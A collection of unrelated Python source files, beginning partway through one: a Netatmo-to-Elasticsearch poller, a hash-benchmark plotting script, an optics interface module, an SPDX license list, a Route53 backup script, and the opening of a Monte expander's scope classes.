        station['date_min_temp'] = pd.Timestamp.utcfromtimestamp(station['date_min_temp'])
    if 'date_max_temp' in station:
        station['date_max_temp'] = pd.Timestamp.utcfromtimestamp(station['date_max_temp'])
    station_data = pd.json_normalize(station)
    # Rename to the index's column names. NOTE: the 'tempature' spellings are
    # the established index/CSV schema -- do not "fix" them without reindexing.
    station_data = station_data.rename(columns={
        "Temperature": "temperature",
        'CO2' : 'co2',
        'Humidity' : 'humidity',
        'Noise' : 'noise',
        'Pressure' : 'pressure',
        'AbsolutePressure' : 'absolute_pressure',
        'min_temp' : 'min_tempature',
        'max_temp' : 'max_tempature',
        'date_max_temp' : 'date_max_tempature',
        'date_min_temp' : 'date_min_tempature',
        'temp_trend' : 'tempature_trend',
        'When' : '@timestamp'
        })
    station_data["station_name"] = station_name
    # append data frame to CSV file (no header: the file accumulates rows)
    station_data.to_csv(backup_dir+station_name+'.csv', mode='a', index=False, header=False)
    # Push Results to Elastic
    df = ed.pandas_to_eland(
        pd_df=station_data,
        es_client=es,
        es_dest_index=index_name,
        es_if_exists="append",
        es_type_overrides={
            '@timestamp' : 'date'
        },
        use_pandas_index_for_es_ids=False,
        es_refresh=True
    )
if __name__ == "__main__":
    # Poll the Netatmo station on a fixed interval and forward each reading to
    # Elasticsearch (plus a local CSV backup) until SIGTERM/SIGINT arrives.
    running = True
    interval = None
    authorization = None
    client_id = None
    client_secret = None
    netatmo_username = None
    netatmo_password = None
    netatmo_station_id = None  # initialized so a missing [netatmo] section fails cleanly
    elastic_url = None
    elastic_username = None
    elastic_password = None
    elastic_verify_certs = True  # NOTE(review): currently unused, see Elasticsearch() below
    ca_certs_dir = None  # initialized so a missing [elastic] section fails cleanly

    args = parse_args()
    config = parse_config(args.config)

    # NOTE(review): handlers are only installed when $TERM is set -- presumably
    # to detect an interactive shell; confirm this gating is intentional.
    if environ.get("TERM"):
        signal.signal(signal.SIGTERM, shutdown)
        signal.signal(signal.SIGINT, shutdown)

    # Configuration file values first ...
    if "global" in config:
        interval = int(config["global"]["interval"])
    if "netatmo" in config:
        client_id = config["netatmo"]["client_id"]
        client_secret = config["netatmo"]["client_secret"]
        netatmo_username = config["netatmo"]["netatmo_username"]
        netatmo_password = config["netatmo"]["netatmo_password"]
        netatmo_station_id = config["netatmo"]["netatmo_station_id"]
    if "elastic" in config:
        elastic_url = config["elastic"]["elastic_url"]
        elastic_username = config["elastic"]["elastic_username"]
        elastic_password = config["elastic"]["elastic_password"]
        ca_certs_dir = config["elastic"]["ca_certs_dir"]

    # ... then environment variables override them.
    if environ.get("NETATMO_CLIENT_ID"):
        client_id = environ.get("NETATMO_CLIENT_ID")
    if environ.get("NETATMO_CLIENT_SECRET"):
        client_secret = environ.get("NETATMO_CLIENT_SECRET")
    if environ.get("NETATMO_USERNAME"):
        netatmo_username = environ.get("NETATMO_USERNAME")
    if environ.get("NETATMO_PASSWORD"):
        netatmo_password = environ.get("NETATMO_PASSWORD")
    if environ.get("NETATMO_STATION_ID"):
        netatmo_station_id = environ.get("NETATMO_STATION_ID")
    if environ.get("ELASTIC_URL"):
        elastic_url = environ.get("ELASTIC_URL")
    if environ.get("ELASTIC_USERNAME"):
        elastic_username = environ.get("ELASTIC_USERNAME")
    # BUG FIX: this previously tested NETATMO_STATION_ID, so the
    # ELASTIC_PASSWORD override only applied when the station id was also set.
    if environ.get("ELASTIC_PASSWORD"):
        elastic_password = environ.get("ELASTIC_PASSWORD")
    if environ.get("CA_CERTS"):
        ca_certs_dir = environ.get("CA_CERTS")
    # NOTE(review): INTERVAL is only consulted when the config file already
    # set an interval -- confirm whether the env var should always win.
    if interval is None:
        interval = 300  # interval in seconds; default is 5 minutes
    elif environ.get("INTERVAL"):
        interval = int(environ.get("INTERVAL"))
    if environ.get("BACKUP_DIR"):
        backup_dir = environ.get("BACKUP_DIR")
    else:
        backup_dir = config["global"]["backup_dir"]

    # ElasticSearch Connection
    es = Elasticsearch(
        elastic_url,
        basic_auth=(elastic_username, elastic_password),
        verify_certs=False,  # currently using self signed certs
        ca_certs=ca_certs_dir
    )

    while running:
        authorization = pyatmo.ClientAuth(
            client_id=client_id,
            client_secret=client_secret,
            username=netatmo_username,
            # BUG FIX: restored from a redacted "<PASSWORD>" placeholder,
            # which was a syntax error.
            password=netatmo_password,
            scope="read_station"
        )
        try:
            weather_data = pyatmo.WeatherStationData(authorization)
            weather_data.update()
            weather_current_data = weather_data.get_last_data(netatmo_station_id)
            # 0 - Primary Station
            # 1 - Outside Module
            stations = list(weather_current_data.keys())
            primary_station = weather_current_data[stations[0]]
            outside_station = weather_current_data[stations[1]]
            process_station(es, "netatmo_indoor", primary_station, 'Basement', backup_dir)
            process_station(es, "netatmo_outdoor", outside_station, 'Backyard', backup_dir)
        except Exception as e:
            print("exception {}".format(e))
        # Print and wait the interval to try again
        sleep(interval)
import json
import math
import pandas as pd
import sys
import git
from pathlib import Path
from inspect import cleandoc
from plotly.subplots import make_subplots
import plotly.express as px
import plotly.graph_objects as go
import plotly
from pretty_html_table import build_table
# plot colors
pal = px.colors.qualitative.Plotly
# fixed palette so every hash function keeps the same color across all charts
color_sequence = ["#BBB", "#777", "#111", pal[9], pal[4], pal[6], pal[1], pal[0], "#58a2c4", pal[5], pal[2], pal[7], pal[8], pal[3]]

# plot labels: human-readable axis titles keyed by dataframe column name
plot_labels = dict(
    cpu_time_per_key='ns per key',
    dataset_elem_count='dataset size',
    elem_magnitude='dataset size',
    hashfn_bits_per_key='bits per key',
    throughput='keys per second')

# benchmark results: first CLI argument, defaulting to results.json
file = "results.json" if len(sys.argv) < 2 else sys.argv[1]
with open(file) as data_file:
    data = json.load(data_file)

# convert json results to dataframe
df = pd.json_normalize(data, 'benchmarks')

# augment additional computed columns
# benchmark labels look like "<hashfn>:<dataset>[:<probe_distribution>]"
df["hashfn"] = df["label"].apply(lambda x : x.split(":")[0])
df["dataset"] = df["label"].apply(lambda x : x.split(":")[1])
df["probe_distribution"] = df["label"].apply(lambda x : x.split(":")[2] if len(x.split(":")) > 2 else "-")
# order data (important for legend & colors)
def order(x):
    """Map a hash-function name to its fixed legend/color rank (0 = unknown)."""
    ranks = {
        "donothinghash": 1,
        "rankhash": 2,
        "recsplit_leaf12_bucket9": 3,
        "compacttrie": 4,
        "fastsuccincttrie": 5,
        "simplehollowtrie": 6,
        "hollowtrie": 7,
        "mwhc": 8,
        "compressedmwhc": 9,
        "compactedmwhc": 10,
        "rmirank": 11,
        "compressedrmirank": 12,
        "learnedlinear": 13,
        "adaptivelearnedmmphf": 14,
        "mapomphf": 15,
    }
    return ranks.get(x.lower(), 0)
# rank rows so legends and colors come out in the canonical order
df["order"] = df.apply(lambda x : order(x["hashfn"]), axis=1)
df = df.sort_values(by=["order", "dataset_elem_count"])
# augment plotting datasets
def magnitude(x):
    """Format a positive count in scientific notation, e.g. 100000000 -> '1.0e8'.

    BUG FIX: the previous format string was ``f'{rem}e-{exp}'``, inserting a
    spurious minus sign that rendered large dataset sizes as tiny ones
    (the commented-out LaTeX variant shows the positive exponent intended).
    """
    l = math.log(x, 10)
    rem = round(x/pow(10, l), 2)
    exp = int(round(l, 0))
    return f'{rem}e{exp}'
df["elem_magnitude"] = df.apply(lambda x : magnitude(x["dataset_elem_count"]), axis=1)

# prepare datasets for plotting & augment dataset specific columns
# split benchmark rows into lookup-time and build-time subsets
lt_df = df[df["name"].str.lower().str.contains("lookuptime")].copy(deep=True)
bt_df = df[df["name"].str.lower().str.contains("buildtime")].copy(deep=True)
# lookup benchmarks already report per-key nanoseconds
lt_df["cpu_time_per_key"] = lt_df['cpu_time']
lt_df["throughput"] = lt_df.apply(lambda x : 10**9 / x["cpu_time_per_key"], axis=1)
# build benchmarks report total time; normalize by key count
bt_df["cpu_time_per_key"] = bt_df.apply(lambda x : x["cpu_time"] / x["dataset_elem_count"], axis=1)
bt_df["throughput"] = bt_df.apply(lambda x : 10**9 / x["cpu_time_per_key"], axis=1)
bt_df["sorted"] = bt_df.apply(lambda x : x["name"].lower().startswith("presorted"), axis=1)

# ensure export output folder exists (second CLI argument, default "docs")
results_path = "docs" if len(sys.argv) < 3 else sys.argv[2]
Path(results_path).mkdir(parents=True, exist_ok=True)
def convert_to_html(fig):
    """Serialize a Plotly figure to an embeddable fragment (no <html> wrapper;
    plotly.js is loaded once by the surrounding page)."""
    fragment = fig.to_html(full_html=False, include_plotlyjs=False)
    return fragment
def plot_lookup_times():
    """Line chart: lookup ns/key vs dataset size, faceted by probe
    distribution (rows) and dataset (columns). Returns an HTML fragment.

    Removed the unused local ``name``.
    """
    fig = px.line(
        lt_df,
        x="dataset_elem_count",
        y="cpu_time_per_key",
        color="hashfn",
        facet_row="probe_distribution",
        facet_col="dataset",
        category_orders={"dataset": ["seq", "gap_10", "uniform", "normal", "wiki", "osm", "fb"]},
        markers=True,
        log_x=True,
        labels=plot_labels,
        color_discrete_sequence=color_sequence,
        height=600,
        title="Lookup - nanoseconds per key"
    )
    return convert_to_html(fig)
def plot_hashfn_bits_per_key():
    """Line chart: total bits per key vs dataset size, faceted by dataset.
    Returns an HTML fragment.

    Removed the unused local ``name``.
    """
    fig = px.line(
        lt_df,
        x="dataset_elem_count",
        y="hashfn_bits_per_key",
        color="hashfn",
        facet_col="dataset",
        facet_col_wrap=3,
        category_orders={"dataset": ["seq", "gap_10", "uniform", "normal", "wiki", "osm", "fb"]},
        log_x=True,
        markers=True,
        labels=plot_labels,
        color_discrete_sequence=color_sequence,
        height=600,
        title="Space - total bits per key"
    )
    # clamp the y axis; some structures blow far past the interesting range
    fig.update_yaxes(range=[-50, 700])
    return convert_to_html(fig)
def plot_pareto_lookup_space():
    """Scatter: lookup time vs space per key for the largest datasets
    (> 9e7 keys). Returns an HTML fragment.

    Removed the unused local ``name`` and stale commented-out options.
    """
    filtered = lt_df[
        (lt_df["dataset_elem_count"] > 9 * 10**7)
    ]
    fig = px.scatter(
        filtered,
        x="cpu_time_per_key",
        y="hashfn_bits_per_key",
        color="hashfn",
        facet_row="probe_distribution",
        facet_col="dataset",
        category_orders={"dataset": ["seq", "gap_10", "uniform", "normal", "wiki", "osm", "fb"]},
        labels=plot_labels,
        color_discrete_sequence=color_sequence,
        height=600,
        title="Pareto - lookup (ns) vs space (bits/key)"
    )
    return convert_to_html(fig)
def plot_build_time():
    """Grouped bars: build throughput (keys/s) for the largest datasets,
    faceted by dataset and pre-sortedness. Returns an HTML fragment.

    Removed the unused local ``name``; the trace-selector lambda parameter
    was named ``go``, shadowing the plotly.graph_objects import.
    """
    # copy to enable value changes
    f_bt_df = bt_df.copy(deep=True)
    f_bt_df = f_bt_df[f_bt_df["dataset_elem_count"] > 9 * 10**7]
    fig = px.bar(
        f_bt_df,
        x="elem_magnitude",
        y="throughput",
        color="hashfn",
        barmode="group",
        facet_col="dataset",
        facet_row="sorted",
        category_orders={"dataset": ["seq", "gap_10", "uniform", "normal", "wiki", "osm", "fb"]},
        labels=plot_labels,
        color_discrete_sequence=color_sequence,
        height=600,
        title="Build - throughput in keys per second"
    )
    # hide the do-nothing baseline unless the user enables it in the legend
    fig.update_traces(
        patch={'visible': 'legendonly'},
        selector=lambda trace: trace.legendgroup.lower() in ["donothinghash"])
    return convert_to_html(fig)
def plot_raw_data():
    """Render every benchmark row as a scrollable HTML table fragment."""
    table_df = df.sort_values(by=["name"]).rename(
        {"cpu_time": "ns", 'hashfn': 'function', "probe_distribution": "probe distribution", 'dataset_elem_count': 'keys', 'hashfn_bits_per_key': 'bits per key'},
        axis='columns')
    table_df = table_df[["name", "function", "probe distribution", "dataset", "keys", "bits per key", "ns"]]
    # render integers without float artifacts
    table_df["ns"] = table_df.apply(lambda row: str(int(float(row["ns"]))), axis=1)
    table_df["keys"] = table_df.apply(lambda row: str(int(row["keys"])), axis=1)
    return cleandoc(f"""
        <div style="width: 100%; height: 500px; overflow-y: scroll;">
        {build_table(table_df, 'blue_light', width="100%")}
        </div>
        """)
# Assemble the static report page; plotly.js is loaded once from the CDN and
# shared by every embedded figure.
# NOTE(review): the Raw Data heading opens <h3> but closes </h2> -- harmless
# in browsers, but worth fixing in the template at some point.
with open(f'{results_path}/index.html', 'w') as readme:
    readme.write(cleandoc(f"""
        <!doctype html>
        <html>
        <head>
        <script src="https://cdn.plot.ly/plotly-latest.min.js"></script>
        </head>
        <body style="display: grid; grid-template-columns: repeat(auto-fit, minmax(1200px, 1fr))">
        <embed src="functions.html" style="width: 100%; height: 500px;"/>
        {plot_lookup_times()}
        {plot_hashfn_bits_per_key()}
        {plot_pareto_lookup_space()}
        {plot_build_time()}
        <div style="margin: 15px">
        <h3 style="color: rgb(42, 63, 95)">Raw Data</h2>
        {plot_raw_data()}
        </div>
        </body>
        </html>
        """))
|
from typing import Dict, Sequence, Tuple
from enum import Enum
import numpy as np
import otk.functions
import scipy.interpolate
from otk.functions import make_perpendicular
from .. import v4hb
from .. import functions
from .. import ri
class Directions(Enum):
    """Which side of the interface an outgoing mode leaves on."""
    REFLECTED = 0
    TRANSMITTED = 1
class InterfaceMode:
    """One outgoing mode (reflected or transmitted) produced at an interface."""

    def __init__(self, direction: int, matrix: np.ndarray, vector: np.ndarray, n: np.ndarray):
        """
        Args:
            direction: Either REFLECTED or TRANSMITTED.
            matrix: Projection matrix.
            vector: Outgoing k vector.
            n: Outgoing refractive index.
        """
        self.direction = Directions(direction)
        self.matrix = np.asarray(matrix)
        assert self.matrix.shape[-2:] == (4, 4)
        self.vector = np.asarray(vector)
        assert self.vector.shape[-1] == 4
        # Row space of matrix should be orthogonal to outgoing k vector.
        assert np.allclose(v4hb.dot(self.matrix, self.vector[..., None, :]), 0, atol=1e-7)
        # This checks that the shapes are consistent.
        self.shape = np.broadcast(self.matrix, self.vector[..., None]).shape
        self.n = n

    def __repr__(self):
        return 'InterfaceMode(matrix=%r, vector=%r, n=%r)'%(self.matrix, self.vector, self.n)
class Interface:
    """Abstract optical interface: maps an incident field to outgoing modes."""

    def calc_modes(self, point: np.ndarray, normal: np.ndarray, lamb: float, vector: np.ndarray, n: np.ndarray) -> Dict[
        str, InterfaceMode]:
        """
        Args:
            point: ...x4 array in surface local coordinates.
            normal: ...x4 array in surface local coordinates.
            lamb: wavelength
            vector: ...x4 array of normalized incident k vectors in local coordinates.
            n: incident refractive index.

        Returns:
            Mapping of mode name (e.g. 'reflected') to InterfaceMode.
        """
        raise NotImplementedError()
def calc_outer_product(vector1, vector2, amplitude):
    """Output[...,i,j] = vector1[...,i]*amplitude*vector2[...,j]."""
    left = np.asarray(vector1)[..., :, None]
    right = np.asarray(vector2)[..., None, :]
    weight = np.atleast_1d(amplitude)
    assert weight.shape[-1] == 1
    return left * weight[..., None] * right
def calc_matrix(incident_vectors, deflected_vectors, amplitudes):
    """Sum of outer products over matched (incident, deflected, amplitude) triples."""
    total = 0
    for incident, deflected, amplitude in zip(incident_vectors, deflected_vectors, amplitudes):
        total = total + calc_outer_product(incident, deflected, amplitude)
    return total
class Mirror(Interface):
    """Perfect mirror: reflects both polarizations with unit amplitude."""

    def calc_modes(self, point: np.ndarray, normal: np.ndarray, lamb: float, incident_vector: np.ndarray,
                   n: np.ndarray) -> Dict:
        reflected = otk.functions.reflect_vector(incident_vector, normal)
        # Basis: s perpendicular to the plane of incidence, p in it.
        s_pol = v4hb.cross(normal, incident_vector)
        p_pol_in = v4hb.cross(incident_vector, s_pol)
        p_pol_out = v4hb.cross(reflected, s_pol)
        projection = calc_matrix((p_pol_in, s_pol), (p_pol_out, s_pol),
                                 np.asarray((1, 1)))
        return dict(reflected=InterfaceMode(Directions.REFLECTED, projection, reflected, n))
class IsotropicMediaInterface(Interface):
    """Interface between isotropic media with indices n1 (front) and n2 (back).

    Subclasses supply the reflection/transmission amplitudes via
    calc_amplitudes; this class builds the outgoing InterfaceModes.
    """
    def __init__(self, n1, n2, reflects: bool = True, transmits: bool = True):
        self.n1 = n1
        self.n2 = n2
        self.reflects = reflects
        self.transmits = transmits

    def calc_amplitudes(self, n1, n2, cos_theta1, lamb) -> Tuple[Tuple]:
        """Returns amplitudes ((rp, rs), (tp, ts))."""
        raise NotImplementedError()

    def calc_modes(self, point: np.ndarray, normal: np.ndarray, lamb: float, incident_vector: np.ndarray,
                   n: np.ndarray) -> Dict:
        """
        Args:
            point: ...x4 surface point in local coordinates (unused here).
            normal: ...x4 surface normal.
            lamb: wavelength.
            incident_vector: ...x4 normalized incident k vector.
            n: incident refractive index (unused; recomputed from n1/n2).

        Returns:
            Mapping of (Outgoing, Polarization) pairs to InterfaceMode objects.
        """
        n1 = self.n1(lamb)
        n2 = self.n2(lamb)
        cos_theta1 = v4hb.dot(normal, incident_vector)
        # Removed a dead `if 0:` branch that sketched an elementwise np.choose
        # version of the sign handling below; it was never executed.
        # All rays must hit the surface from the same side; the sign of
        # cos_theta1 determines which medium is "first".
        assert np.all(cos_theta1>=0) or np.all(cos_theta1<=0)
        cos_theta1 = cos_theta1.ravel()[0]
        if cos_theta1>0:
            na, nb = n1, n2
        else:
            na, nb = n2, n1
        cos_theta1 = abs(cos_theta1)
        refracted_vector = otk.functions.refract_vector(incident_vector, normal, nb/na)*na/nb
        reflected_vector = otk.functions.reflect_vector(incident_vector, normal)
        # Generate unit vector perpendicular to normal and incident.
        s_pol_vector = make_perpendicular(normal, incident_vector)
        incident_p_pol_vector = v4hb.cross(incident_vector, s_pol_vector)
        refracted_p_pol_vector = v4hb.cross(refracted_vector, s_pol_vector)
        reflected_p_pol_vector = v4hb.cross(reflected_vector, s_pol_vector)
        amplitudes = self.calc_amplitudes(na, nb, cos_theta1, lamb)
        modes = {}
        if self.reflects:
            matrix = calc_matrix((incident_p_pol_vector, s_pol_vector), (reflected_p_pol_vector, s_pol_vector),
                                 amplitudes[0])
            modes['reflected'] = InterfaceMode(Directions.REFLECTED, matrix, reflected_vector, na)
        if self.transmits:
            matrix = calc_matrix((incident_p_pol_vector, s_pol_vector), (refracted_p_pol_vector, s_pol_vector),
                                 amplitudes[1])
            modes['transmitted'] = InterfaceMode(Directions.TRANSMITTED, matrix, refracted_vector, nb)
        return modes
class PerfectRefractor(IsotropicMediaInterface):
    """Idealized interface: transmits with unit amplitude, never reflects."""

    def __init__(self, n1, n2):
        super().__init__(n1, n2, False, True)

    def calc_amplitudes(self, n1, n2, cos_theta1, lamb):
        # ((rp, rs), (tp, ts))
        return ((0, 0), (1, 1))
class FresnelInterface(IsotropicMediaInterface):
    """Bare interface between two media, obeying the Fresnel equations."""

    def calc_amplitudes(self, n1, nb, cos_theta1, lamb):
        return functions.calc_fresnel_coefficients(n1, nb, cos_theta1)

    def __repr__(self):
        return 'FresnelInterface(n1=%r, n2=%r)'%(self.n1, self.n2)

    def flip(self):
        # Same interface as seen from the opposite side.
        return FresnelInterface(self.n2, self.n1)
class SampledCoating(IsotropicMediaInterface):
    """Coating defined by amplitude samples on a (wavelength, angle) grid.

    Symmetric - amplitudes are the same from both sides.
    """
    def __init__(self, n1: ri.Index, n2: ri.Index, lambs: Sequence, thetas: Sequence, amplitudes: np.ndarray):
        """
        Args:
            lambs: Sampled wavelengths.
            thetas: Sampled angles.
            amplitudes: Array with dimensions (Outgoing, Polarization, wavelength, angle).
        """
        IsotropicMediaInterface.__init__(self, n1, n2)
        self.lambs = np.asarray(lambs)
        assert self.lambs.ndim == 1
        self.thetas = np.asarray(thetas)
        assert self.thetas.ndim == 1
        self.amplitudes = amplitudes
        assert self.amplitudes.shape == (2, 2, len(self.lambs), len(self.thetas))

    def __repr__(self):
        return 'SampledCoating(n1=%r, n2=%r, lambs=%r, thetas=%r, amplitudes=%r)'%(
            self.n1, self.n2, self.lambs, self.thetas, self.amplitudes)

    def calc_amplitudes(self, n1, n2, cos_theta1, lamb):
        """Interpolate the sampled amplitudes at (lamb, arccos(cos_theta1)).

        Returns:
            Nested lists [[rp, rs], [tp, ts]] per the base-class contract.
        """
        results = []
        theta1 = np.arccos(cos_theta1)
        # Loop over reflected, transmitted.
        for amplitudes in self.amplitudes:
            results.append([])
            # Loop over p, s. BUG FIX: this previously iterated
            # `zip(amplitudes)`, wrapping each (wavelength, angle) sample
            # table in a 1-tuple and breaking the axis-0 interpolation below.
            for amplitude in amplitudes:
                # TODO switch to complex interpolation.
                amplitude_lamb = scipy.interpolate.interp1d(self.lambs, amplitude, axis=0, copy=False)(lamb)
                amplitude_lamb_theta = scipy.interpolate.interp1d(self.thetas, amplitude_lamb, axis=0, copy=False)(
                    theta1)
                results[-1].append(amplitude_lamb_theta)
        return results
|
"""common constants"""
import logging
# Shared logger configuration: root logger at DEBUG, package logger at INFO.
log_format = "%(filename)s: %(message)s"
logging.basicConfig(format=log_format, level=logging.DEBUG)
LOGGER = logging.getLogger("haxo")
LOGGER.setLevel(logging.INFO)
# Recognized SPDX-style license identifiers (includes some common non-SPDX
# aliases such as "GPL" and "BSD").
SPDX = [
    "GPL-1",
    "GPL-2",
    "GPL-2.0",
    "GPL-3",
    "GPL",
    "AAL",
    "AFL-3.0",
    "AGPL-3.0",
    "Apache-1.1",
    "Apache-2.0",
    "APL-1.0",
    "APSL-2.0",
    "Artistic-1.0",
    "Artistic-2.0",
    "Artistic",
    "BSD-1-Clause",
    "BSD-2-Clause",
    "BSD-2-Clause-Patent",
    "BSD-3-Clause",
    "BSD-3-Clause-LBNL",
    "BSD",
    "BSL-1.0",
    "CAL-1.0",
    "CATOSL-1.1",
    "CC0-1.0",
    "CDDL-1.0",
    "CECILL-2.1",
    "CNRI-Python",
    "CPAL-1.0",
    "CPL-1.0",
    "CUA-OPL-1.0",
    "CVW",
    "ECL-1.0",
    "ECL-2.0",
    "EFL-1.0",
    "EFL-2.0",
    "Entessa",
    "EPL-1.0",
    "EPL-2.0",
    "EUDatagrid",
    "EUPL-1.2",
    "Fair",
    "Frameworx-1.0",
    "GFDL",
    "GFDL-1.2",
    "GFDL-1.3",
    "HPND",
    "IPA",
    "IPL-1.0",
    "ISC",
    "LGPL-2",
    "LGPL-2.1",
    "LGPL-3",
    "LGPL-3.0",
    "LGPL",
    "LiLiQ-P",
    "LiLiQ-R",
    "LiLiQ-R+",
    "LPL-1.02",
    "LPPL-1.3c",
    "MirOS",
    "MIT",
    "Motosoto",
    "MPL-1.0",
    "MPL-1.1",
    "MPL-2.0",
    "MS-PL",
    "Ms-RL",
    "MS-RL",
    "MulanPSL - 2.0",
    "Multics",
    "NASA-1.3",
    "Naumen",
    "NCSA",
    "NGPL",
    "Nokia Open Source License",
    "NOSL",
    "NPOSL-3.0",
    "NTP",
    "OCLC-2.0",
    "ODbL",
    "OFL-1.1",
    "OGTSL",
    "OLDAP-2.8",
    "OSET-PL-2.1",
    "OSL-1.0",
    "OSL-2.1",
    "OSL-3.0",
    "PHP-3.0",
    "Plan9",
    "PostgreSQL",
    "Python-2.0",
    "PSF",
    "QPL-1.0",
    "RPL-1.1",
    "RPL-1.5",
    "RPSL-1.0",
    "RSCPL",
    "SimPL-2.0",
    "SISSL",
    "Sleepycat",
    "SPL-1.0",
    "UPL",
    "VSL-1.0",
    "W3C",
    "Watcom-1.0",
    "WXwindows",
    "Xnet",
    "YPL-1.1",
    "Zimbra-1.3",
    "Zlib",
    "ZPL-2.0",
]
if __name__ == "__main__":
    # Print one identifier per line; `license_id` avoids shadowing the
    # `license` builtin.
    for license_id in SPDX:
        print(license_id)
|
# route53_s3_backup.py
import boto3
import time
import datetime
import json
import os
# Settings:
deployToS3Bucket = False  # set True to also push the JSON dumps to S3
bucketName = "x"  # destination S3 bucket name

# Init:
now = datetime.datetime.now()
today = now.strftime("%Y-%m-%d")  # per-day backup folder name
s3 = boto3.resource('s3')
route53 = boto3.client('route53')
route53FolderName = "route53"
fullFolderPath = route53FolderName + "/" + today
# Accumulators filled by getHostedZones()/getRecords(); errors are collected
# here instead of aborting the run.
hostedZones = []
recordSets = {}
globalErrorList = []
def main():
    """Snapshot all Route53 zones to local JSON files, then optionally to S3."""
    getHostedZones()
    getRecords()
    writeRecordsToFile()
    uploadRoute53DataFile()
def getHostedZones(nextMarker=""):
    """Fetch all hosted zones into the global `hostedZones`, following pagination.

    Args:
        nextMarker: Marker from a previous truncated response ("" = first page).
    """
    try:
        print('Listing hosted zones .. ')
        # BUG FIX: `is not ""` compared identity, not equality (and is a
        # SyntaxWarning on modern Pythons); strings need `!=`.
        if nextMarker != "":
            response = route53.list_hosted_zones(Marker=nextMarker)
        else:
            response = route53.list_hosted_zones()
        print('Hosted zone count: ', len(response['HostedZones']))
    except Exception as x:
        globalErrorList.append(str(x))
        print(x)
        # Without a response there is nothing to iterate; previously control
        # fell through and raised NameError on `response`.
        return
    for zone in response['HostedZones']:
        hostedZones.append(zone)
    time.sleep(2)  # stay well under the Route53 API rate limit
    if bool(response['IsTruncated']):
        getHostedZones(str(response['NextMarker']))
def getRecords(startRecordName="", passedInZoneId="", passedInZoneName=""):
    """Collect record sets for every zone in `hostedZones` into `recordSets`.

    Called recursively with a start record name to follow truncated
    (paginated) responses for a single zone.

    Args:
        startRecordName: Pagination cursor ("" = first page for each zone).
        passedInZoneId: Zone id being continued (pagination calls only).
        passedInZoneName: Zone name being continued (pagination calls only).
    """
    print('Getting records for hosted zones .. ')
    # NOTE(review): pagination calls still enter the per-zone loop and return
    # after the first iteration -- it works, but a direct fetch would be
    # clearer; flow preserved as-is.
    for zone in hostedZones:
        try:
            # BUG FIX: both `is not ""` identity comparisons below were
            # replaced with `!=`; `is` on strings is unreliable.
            if startRecordName != "":
                print('Getting additional records for zoneid ', passedInZoneId)
                response = route53.list_resource_record_sets(
                    HostedZoneId=passedInZoneId, StartRecordName=startRecordName)
                print(response)
                for record in response['ResourceRecordSets']:
                    recordSets[passedInZoneName].append(record)
                print(len(recordSets[passedInZoneName]))
            else:
                print('Getting records for ' + str(zone['Name']))
                response = route53.list_resource_record_sets(
                    HostedZoneId=zone['Id'])
                if zone['Name'] not in recordSets:
                    recordSets[zone['Name']] = []
                for record in response['ResourceRecordSets']:
                    recordSets[zone['Name']].append(record)
            print('response record set count: ', len(response['ResourceRecordSets']))
            time.sleep(2)  # stay under the API rate limit
            if response['IsTruncated'] == True:
                print('Truncated response.. going back for more .. ')
                getRecords(str(response['NextRecordName']), str(zone['Id']), str(zone['Name']))
            if startRecordName != "":
                return
        except Exception as x:
            globalErrorList.append(str(x))
            print(x)
def writeRecordsToFile():
    """Dump each zone's record sets as JSON under ./route53/<today>/."""
    print('Writing records to file ..')
    cwd = './' + route53FolderName + '/' + today
    # makedirs replaces the previous two-step mkdir dance and is idempotent.
    os.makedirs(cwd, exist_ok=True)
    for zone in hostedZones:
        # NOTE(review): zone names carry a trailing dot, so 'Name' + 'json'
        # yields e.g. 'example.com.json'. uploadRoute53DataFile builds the
        # same name -- keep the two in sync if this scheme ever changes.
        fileName = cwd + '/' + zone['Name'] + 'json'
        # 'w' truncates any previous dump, replacing the old
        # remove-then-append sequence.
        with open(fileName, 'w') as outputFile:
            print(json.dumps(recordSets[zone['Name']]), file=outputFile)
def uploadRoute53DataFile():
    """Upload today's per-zone JSON dumps to S3 (no-op unless deployToS3Bucket)."""
    if deployToS3Bucket is False:
        return
    print('Writing files to s3 bucket ..')
    cwd = './' + route53FolderName + '/' + today
    for zone in hostedZones:
        fullFileName = cwd + '/' + zone['Name'] + 'json'
        # Upload a new file
        print('Writing ' + zone['Name'] + ' to bucket')
        # Context manager closes the handle; it was previously leaked.
        with open(fullFileName, 'rb') as data:
            s3.Bucket(bucketName).put_object(Key=route53FolderName +
                                             '/'+today+'/'+zone['Name']+'json', Body=data)
        time.sleep(1)
main()
# monte/expander.py
from ometa.grammar import TreeTransformerGrammar
from ometa.runtime import TreeTransformerBase, ParseError
from terml.nodes import Tag, Term, termMaker as t
### XXX TODO: Create TemporaryExprs for variables generated by
### expansion. Replace all temps with nouns in a single pass at the
### end.
# Shared literal terms for the boolean nouns (equivalent to
# Term(Tag('true'/'false'), None, None, None)).
TRUE = t.NounExpr('true')
FALSE = t.NounExpr('false')
class ScopeSet(object):
    """A list-backed collection of names supporting set algebra.

    Backing storage is a plain list, so iteration order is deterministic
    and observable (note that `-` uses swap-with-last removal, which
    reorders survivors).
    """

    def __init__(self, bits=()):
        self.contents = list(bits)

    def __sub__(self, other):
        # Swap-with-last removal: O(1) per removed name.
        remaining = self.contents[:]
        for name in other:
            if name in remaining:
                remaining[remaining.index(name)] = remaining[-1]
                del remaining[-1]
        return ScopeSet(remaining)

    def __and__(self, other):
        # Scan the smaller side, probe the bigger one.
        if len(self) > len(other):
            bigger, smaller = self.contents, list(other)
        else:
            bigger, smaller = list(other), self.contents
        return ScopeSet(name for name in smaller if name in bigger)

    def __or__(self, other):
        combined = list(other)
        for name in self.contents:
            if name not in combined:
                combined.append(name)
        return ScopeSet(combined)

    def getKeys(self):
        return self.contents[:]

    def __contains__(self, o):
        return o in self.contents

    def __iter__(self):
        return iter(self.contents)

    def __len__(self):
        return len(self.contents)

    def butNot(self, other):
        # Like `-`, but preserves the order of the survivors.
        excluded = list(other)
        return ScopeSet(name for name in self.contents if name not in excluded)
class StaticScope(object):
    """Static summary of the names an expression reads, assigns, and defines.

    Attributes (ScopeSets unless noted):
        namesRead: free variables read.
        namesSet: free variables assigned.
        defNames: names introduced by final (immutable) definitions.
        varNames: names introduced by `var` (mutable) definitions.
        metaStateExprFlag: bool; True if meta.getState() appears.
    """
    def __init__(self, namesRead=None, namesSet=None, metaStateExprFlag=False,
                 defNames=None, varNames=None):
        if namesRead is None:
            namesRead = ScopeSet()
        if namesSet is None:
            namesSet = ScopeSet()
        if defNames is None:
            defNames = ScopeSet()
        if varNames is None:
            varNames = ScopeSet()
        self.namesRead = ScopeSet(namesRead)
        self.namesSet = ScopeSet(namesSet)
        self.defNames = ScopeSet(defNames)
